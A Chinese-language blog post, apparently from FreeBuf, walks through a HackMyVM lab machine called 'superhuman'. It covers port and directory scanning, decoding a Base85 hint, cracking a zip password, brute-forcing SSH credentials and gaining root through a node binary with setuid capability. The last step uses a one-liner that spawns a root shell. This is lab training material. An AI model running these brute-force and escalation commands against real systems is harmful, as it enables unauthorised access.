freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

记一次hackmyvm综合靶场的渗透测试-superhuman
2022-04-10 09:31:38
所属地 黑龙江省

前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

信息收集阶段

靶机:192.168.1.128

Kali攻击机:未知

目标:user权限和root权限

nmap -sn 192.168.1.0/24

1649553932_6252320c360344939d07d.png!small?1649553932517

nmap -A -p1-65535 192.168.1.3

1649553942_625232162bc3ff12a24a7.png!small?1649553942500

开放了22端口和80端口:

漏洞利用阶段

访问下:白屏

http://192.168.1.3/

查看源代码:

1649553962_6252322ac7b8eb4fa8f2f.png!small?1649553963036

有个tips:

If your eye was sharper, you would see everything in motion, lol

如果你的眼睛更锋利点,你会再运行中看到一切!

我怀疑访问这个网页有重定向!

BURP一下!并没有!

源代码中有张图片!

http://192.168.1.3/nietzsche.jpg

1649553973_625232351675cee26222f.png!small?1649553973307

百度识图说着尼采!

接着目录扫描走起!!

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.3/ -x txt,html,php,zip,bak,log

这个目录没扫到!换个大点的!!

gobuster dir -w /usr/share/wordlists/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.1.3/ -x txt,html,php,zip,bak

1649553997_6252324d175625292e0b8.png!small?1649553997402

扫出了东西:

访问这个地址:http://192.168.1.3/notes-tips.txt

F(&m'D.Oi#De4!--ZgJT@;^00D.P7@8LJ?tF)N1B@:UuC/g+jUD'3nBEb-A+De'u)F!,")@:UuC/g(Km+CoM$DJL@Q+Dbb6ATDi7De:+g@<HBpDImi@/hSb!FDl(?A9)g1CERG3Cb?i%-Z!TAGB.D>AKYYtEZed5E,T<)+CT.u+EM4--Z!TAA7]grEb-A1AM,)s-Z!TADIIBn+DGp?F(&m'D.R'_DId*=59NN?A8c?5F<G@:Dg*f@$:u@WF`VXIDJsV>AoD^&ATT&:D]j+0G%De1F<G"0A0>i6F<G!7B5_^!+D#e>ASuR'Df-\,ARf.kF(HIc+CoD.-ZgJE@<Q3)D09?%+EMXCEa`Tl/c

这是啥?如果你看到了编码,但分不清编码怎么办?

Base16:使用16个ASCII可打印字符(数字0-9和字母A-F),对任意字节数据进行编码。Base32:Base32编码是使用32个可打印字符(字母A-Z和数字2-7)对任意字节数据进行编码的方案,编码后的字符串不用区分大小写并排除了容易混淆的字符,可以方便地由人类使用并由计算机处理。

Base64:在Base64中的可打印字符包括字母A-Z、a-z、数字0-9,这样共有62个字符,此外两个可打印符号在不同的系统中而不同。一些如uuencode的其他编码方法。

Base85:Base85编码的目标是对二进制数据可打印的ASCII字符进行编码。

Base36:因为可以使用数字 0–9和拉丁字母 A–Z [1](ISO基本拉丁字母)表示数字。

Base58:相比Base64,Base58不使用数字"0",字母大写"O",字母大写"I",和字母小写"l",以及"+"和"/"符号。

Base91:basE91需要91个字符来表示ASCII编码的二进制数据。 从94个可打印ASCII字符(0x21-0x7E)中,以下三个字符被省略以构建basE91字母:

Base62: 26个小写字母+26个大写字母+10个数字=62

这个编码是BASE85!

采用以下网站进行解码:

https://www.tools4noobs.com/online_tools/ascii85_decode/

salome doesn't want me, I'm so sad... i'm sure god is dead...

I drank 6 liters of Paulaner.... too drunk lol. I'll write her a poem and she'll desire me. I'll name it salome_and_?? I don't know.

I must not forget to save it and put a good extension because I don't have much storage

前面那段话说明文件名叫:salome_and_me

后面那段话说没空间了:后缀是zip

salome_and_me.zip

访问http://192.168.1.3/salome_and_me.zip

解压时需要密码!

爆破一下:

1649554049_625232810042ceb6643c5.png!small?1649554049215

参数解释:

[-D|--dictionary]             use a dictionary

[-u|--use-unzip]              use unzip to get out wrong passwords

[-p|--init-password string]   use string as initial password/file

密码是:turtle

解压后:

1649554056_62523288f11352cacbc42.png!small?1649554057246

接着我们用fred为用户名,salome_and_me.txt中的词为密码字典进行爆破!

最终确认:schopenhauer为密码!

登录成功!

1649554065_625232911b9edc1a7d021.png!small?1649554065368

1649554072_625232988b952e7c982b2.png!small?1649554072790

第一个flag:

cat user.txt

Inee*************ower

权限提升阶段

接着就是提权到root了!

老样子!

sudo -l和suid

1649554097_625232b1241f1c685d048.png!small?1649554097367

find / -perm -u=s 2>/dev/null

1649554101_625232b5cfccbceb66ca2.png!small?1649554102084

提权函数网站走起!https://gtfobins.github.io/

然后,对能力进行了评估,并找到了一些可能的升级途径。

/usr/sbin/getcap -r / 2>/dev/null

1649554109_625232bd3c6efc461bb5e.png!small?1649554109468

https://gtfobins.github.io/

找到了一个路由使用这些能力,并找到一个二进制节点。

1649554116_625232c42e36362aa47fa.png!small?1649554116392

执行攻击向量并获取系统的根。

/usr/bin/node -e 'process.setuid(0);child_process.spawn("/bin/sh",{stdio:[0,1,2]})'

1649554123_625232cb9be569a72909e.png!small?1649554123825

cat /root/root.txt

Imth********an

# 渗透测试 # CTF # 网络安全技术 # 靶场平台 # 靶场实战
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录